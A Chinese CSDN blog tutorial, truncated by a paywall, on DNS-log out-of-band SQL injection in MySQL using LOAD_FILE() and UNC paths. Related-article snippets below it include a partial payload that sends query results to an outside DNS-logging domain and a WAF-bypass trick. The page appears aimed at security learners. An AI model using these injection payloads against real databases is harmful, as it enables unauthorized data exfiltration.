五、数据库注入(3)Mysql注入——DNS注入

最新推荐文章于 2022-08-07 21:23:08 发布
最新推荐文章于 2022-08-07 21:23:08 发布
阅读量237 收藏 1
点赞数
分类专栏: SQL注入 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45540609/article/details/115871435
版权
本文探讨了在SQL盲注情况下,如何利用DNS请求来传递数据,避免频繁请求导致的ban风险。通过LOAD_FILE()函数读取文件,并结合DNSLOG工具记录解析日志,实现数据外带。同时,文章提及了WAF的规避方法和SQL注入中可能涉及的服务器操作,包括读写文件及潜在的安全隐患。
摘要由CSDN通过智能技术生成

在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候可以通过DNS请求吧想获得的数据外带出来。

对于sql盲注,常见方法是用二分法去猜,但是这样很麻烦,还容易因为数据请求过于频繁导致被ban。

所以可以把select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。

 

DNS-LOG:DNS服务器的解析记录

 

DNSLOG函数解析

1、LOAD_FILE()       读取文件函数,是数据库函数

读取文件并且返回文件内容是字符串,使用该函数,文件必须位于服务器主机上,必须指定完整路径文件,且必须有file权限,该文件所有字节刻度,但文件内容必须小于max_allow_packet(限制server接收的数据包大小函数,默认1mb)。如果改文件不存在或无法读取,条件之一不满足,函数返回null。

mysql_ini需要添加secure_file_priv=

如果mysql中需要用到 \ ,如路径,就需要使用转义字符 \ ,输入两个 \\ ,斜杠和反斜杠都可以

 

2、UNC路径

核心:SMB共享文件

//Desktop-9d2geep/www(格式)

LOAD_FILE支持SMB文件共享

 

DNSLOG工具

可以记录是否有人访问了域名,并且记录域名是什么

http://www.dnslog.cn/

DNSLOG工具在线给你分配域名

最低0.47元/天 解锁文章
玛卡巴卡巴巴亚卡
关注
专栏目录
[网络安全自学篇] 八十.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
mysql的)DNS注入
weixin_60777183的博客
09-02 249
一、基础知识总结: DNS注入→让盲注变成显错注入 LOAD_FILE() :读取文件的函数 在phpstudy的cmd里用的时候,需要在从其他选项菜单→打开配置文件→mysql-ini的配置文件里加上: secure_file_priv= 配置好后重启,才好使。 举例:select load_file('C\\1.txt') 两个\\原因,其中一个是转义符。 可以写绝对路径,也可以相对路径。 UNC路径: Windows的SMB服务——可以共享文件 load_file 支持UNC路径。 http
MySQL-DNS注入
weixin_45634365的博客
03-03 284
一、DNS注入的原理 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,将盲注变为显错注入 即读取远程共享文件,拼接出函数,进行查询,再拼接到域名中,访问时将访问服务器,记录后查看日志 对于sql盲注,常见的方法是使用二分法一个个猜,但是这样的方法很麻烦,还很容易因为数据请求频繁导致被禁 所以可以将查询到的数据发送给一个URL,利用DNS解析产生的记录日志
MySQL_DNS注入
Mr.Huang_的博客
09-06 168
一、DNSLOG的使用场景 DNS log 【DNS日志注入DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 日志 => 日记 - 记录操作、记录访问的文件 DNS日志 => 某时某分谁谁谁请求我查某某域名 如果我们搭建一个DNS服务器来承接域名解析。所有的访问域名都会被我们的日志记录下来 域名 => 由运营商解析。 修改域名的设置方法,强行执行某个Ip去解析域名 NS记录 固定的域名 由固定的DNS服务器解析 DNS注入的核心,将盲注转化为显错注入 DNS协议
MYSQL--Dns注入
qq_68233961的博客
08-07 1116
MYSQL--Dns注入
mysql——DNS注入
qq_45300786的博客
08-09 1780
DNS log 【DNS日志注入DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 DNS注入的核心,将盲注转化为显错注入 DNS协议:将域名转化为IP 日志 => 记录了域名转化IP请求 比如 ox.qidao.com => DNS记录了这个请求, 那么我们也可以让mysql也能发出请求,DNS也会记录 ...
Mysql注入——DNS注入
m0_55854679的博客
02-17 2070
DNSlog【解决繁琐的盲注】介绍 DNS => 域名解析 LOG => 日志 dns-log => 域名解析日志【记录别人来查询域名和ip的对应】 DNSlog使用场景 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban,所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 DNS
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2228
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
Kali linux 学习笔记(十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3242
学习sqlmap自动注入
MySQL使用LOAD_FILE()函数方法总结
09-09
在本篇文章里小编给大家分享了关于MySQL使用LOAD_FILE()函数方法和相关知识点,需要的朋友们学习下。
MySQL注入Dns 注入
hackzkaq的博客
12-03 212
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 DNS注入利用的场景 在无法直接利用的情况下,但是可以通过DNS请求,通过DNSlog,把数据外带,用DNS解析记录查看。 DNSLOG的使用场景 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时
mysql注入dns注入
seek_2022的博客
05-03 2261
文章目录一、DNS-LOG使用(域名解析日志)(一)DNS简介(二)LOG日志是怎么产生的?(三)DNS-LOG在渗透测试中的应用二、DNS注入相关知识回顾(一)load_file() 读取文件(二)UNC路径(三)绕靶场WAF三、DNS注入靶场实战(一)判断SQL注入(一)绕靶场WAF(二)查询库名(三)查询表名(四)查询字段名()查询并提交flag四、小结 一、DNS-LOG使用(域名解析日志) (一)DNS简介 DNS(域名解析)是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一
mysql dns注入_网络安全从入门到精通 (第章-2) MySQL注入Dns 注入
weixin_27303545的博客
01-27 111
本文内容:DNSLOG的函数解析UNC路径DNSLOG的使用场景DNSLOG注入的具体流程1,DNSLOG的函数解析:Mysql函数:LOAD_FILE()读取文件的函数。读取字符串并返回文档内容未字符串,要使用次函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。该文件所有字节可读,但文件内容必须小于max_allowed_packet(限制server接收的数据包大...
mysql-dnslog注入
Adminxe的博客
05-05 1888
@Adminxe http://ceye.io/ //dnslog注入平台 dnslog原理简介: 简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设...
数据库注入学习笔记2---MySQL注入DNS注入
qq_41759633的博客
08-07 288
引:DNS注入并不是对DNS服务器进行注入,而是利用DNS解析的时候会留下的有用的日志,简称:DNS log注入。 条件:有SQL盲注(或时间)注入的站点,可是用sqlmap跑需要频繁请求,最后导致ip被ban。 发现疑似命令注入的洞,但是目标站点不显示,无法确认是不是有漏洞 目标不让信息显示出来,如能发送请求,那么就可以尝试咱这个办法----用DNS log来获取回显(一般为root权限) 首先...
16、Mysql - dns注入
songling515010475的专栏
05-22 178
为什么load_file能执行? 因为在mysql配置文件里开启了secure_file_priv服务,导致不对mysql的导入导出不做任何限制。 1.前往dnslog.cn申请一个域名 2.防止被WAF拦截,所以在后面拼接/123.txt?id=123当作参数,因为.txt会被WAF认为txt是不能传参数的,是安全的。申请的域名,前面要加三级域名,后面也要加路径,否则不会生效。 /123.txt?id=123 and load_file(concat('//',(select database
MySQL注入-Dns_log注入
m0_51313985的博客
05-18 282
在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被Ban 所以可以将select到的数据发送给一个url,利用dns解析 产生的记录日志来查看数据。 Dns-log =>DNS域名解析协议=>将域名转化为IP log=>日志(记录的东西) Dns的日志 外带数据(oob)–>这里是一个延时盲注 我让数据库去访问某个网站
mysql dns配置_mydns+mysql+myconfig实现可视化管理dns服务器
weixin_39734184的博客
01-19 420
上一篇博客小编讲的是powerDNS的使用,今天小编来和大家聊聊mydns的配置以及使用,网上有很多有关于mydns的配置,小编我也参考过,可是做到myconfig的web管理(后面小编会讲到)就会卡壳,当然小编既然提到这,肯定是有办法解决啦,解决方法小编在后面的实现步骤上详细附上啦。下面开始动手搞定mydns吧。step 1:系统环境以及软件需求小编用的虚拟系统的用的是red hat enter...
sqlmap数据库注入实战指南
"这篇文档详细介绍了如何使用sqlmap进行数据库注入漏洞测试,强调了sqlmap的强大功能,并提供了在Ubuntu 10.10和Windows 7 (x64)环境下测试的实例。此外,还提供了sqlmap的稳定版本下载链接、更新升级方法以及官方...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值